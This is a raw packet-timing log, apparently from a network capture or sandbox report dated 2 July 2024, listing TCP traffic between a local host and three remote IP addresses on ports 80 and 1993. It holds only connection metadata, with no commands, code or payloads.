                  Jul 2, 2024 07:49:32.480534077 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.480967045 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481002092 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481013060 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481018066 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481024027 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481035948 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481039047 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481049061 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481060028 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481071949 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481082916 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481093884 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481100082 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481100082 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481110096 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481120110 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481147051 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481147051 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481175900 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481654882 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481667042 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481678009 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481688023 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481698990 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481709003 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481771946 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.481956005 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481971025 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481987953 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.481998920 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482008934 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482019901 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482029915 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482033014 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482048035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482059002 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482064962 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482064962 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482069969 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482083082 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482115984 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482161045 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482831955 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482844114 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482852936 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482863903 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482877016 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482887030 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482898951 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482903957 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482912064 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482923031 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482933998 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482933998 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482933998 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482945919 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482955933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482956886 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.482969046 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.482980013 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483030081 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483030081 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483607054 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483618021 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483628988 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483695030 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483695030 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483726978 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483738899 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483747959 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483760118 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483769894 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483781099 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483792067 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483803034 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483804941 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483804941 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483814001 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483824968 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483827114 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483835936 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.483865023 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.483876944 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484683990 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484694958 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484704971 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484715939 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484725952 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484736919 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484745979 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484754086 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484754086 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484755993 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484770060 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484780073 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484791040 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484791040 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484791040 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484802961 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484813929 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484824896 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.484831095 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484863997 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.484863997 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485558033 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485570908 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485580921 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485591888 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485603094 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485620022 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485630035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485634089 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485634089 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485642910 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485654116 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.485656023 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485677004 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485698938 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.485955000 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486025095 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486028910 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486036062 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486087084 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486134052 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486172915 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486273050 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486299992 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486310959 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486316919 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486326933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486336946 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486347914 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486356974 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486377001 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486407042 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486593008 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486604929 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486614943 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.486641884 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.486675978 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.570991039 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571058035 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571069956 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571199894 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571212053 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571222067 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571233034 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571247101 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571327925 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571482897 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571495056 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571505070 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571516991 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571527004 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.571542025 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571573973 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.571573973 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740291119 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740397930 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740407944 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740474939 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740490913 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740504980 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740514994 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740525961 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740546942 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740561962 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740788937 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740798950 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740845919 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740936041 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740947008 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740957022 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.740992069 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.740992069 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741027117 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741038084 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741045952 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741055965 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741066933 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741076946 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741086960 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741095066 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741121054 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741121054 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.741620064 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.741694927 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:32.827682972 CEST8049720103.237.86.247192.168.2.6
                  Jul 2, 2024 07:49:32.827773094 CEST4972080192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:35.442249060 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:35.448462963 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:35.448549032 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:35.458380938 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:35.463159084 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:36.469933033 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:36.514381886 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:36.777503967 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:36.784884930 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:36.789683104 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:36.792545080 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:36.797301054 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.548823118 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.553747892 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.558712959 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.855811119 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.857620955 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.862659931 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.862736940 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.866713047 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.871601105 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.881218910 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:37.886076927 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:37.886198997 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:37.886504889 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:37.891316891 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:37.905019045 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:38.499752998 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:38.499824047 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:38.513673067 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:38.518724918 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:38.821245909 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:38.873791933 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.116837025 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.121767998 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.126600981 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.129029989 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.133770943 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.133847952 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.138596058 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.499109030 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:39.500540018 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:39.773494959 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773540974 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773556948 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773571968 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773642063 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.773653030 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773672104 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.873790979 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.024327040 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024348021 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024370909 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024386883 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024400949 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024416924 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024431944 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.024434090 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024463892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.024463892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.025151014 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.025166988 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.025198936 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.025331020 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.025381088 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.025823116 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.170677900 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.275245905 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275270939 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275294065 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275309086 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275325060 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275347948 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.275374889 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.275391102 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275407076 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275430918 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276022911 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276083946 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276103973 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276106119 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276145935 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276211977 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276228905 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276288986 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276932955 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.277021885 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.277043104 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.277070045 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.365611076 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.366449118 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.525635004 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525655031 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525721073 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.525829077 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525907993 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525922060 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525953054 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.526034117 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.526048899 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.526093960 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.526515961 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.526560068 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.526586056 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.526601076 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.526648045 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.526709080 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.527327061 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.527374029 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.527380943 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.527395010 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.527489901 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.527523041 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.527539015 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.527640104 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.527930021 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.527998924 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.528014898 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.528059006 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.528129101 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.528143883 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.528187037 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.537261009 CEST4971180192.168.2.6103.237.86.247
                  Jul 2, 2024 07:49:40.776695013 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.776734114 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.776750088 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.776781082 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.776794910 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.776833057 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.776845932 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.776971102 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.776985884 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777000904 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777023077 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.777051926 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.777471066 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777544022 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777559042 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777580976 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.777646065 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777669907 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777710915 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.777798891 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777813911 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777837038 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.777857065 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.777870893 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.778043032 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.778058052 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.778076887 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.778091908 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.778098106 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.778140068 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.778565884 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.778623104 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.778637886 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.778692961 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.778774023 CEST199349722103.237.87.156192.168.2.6
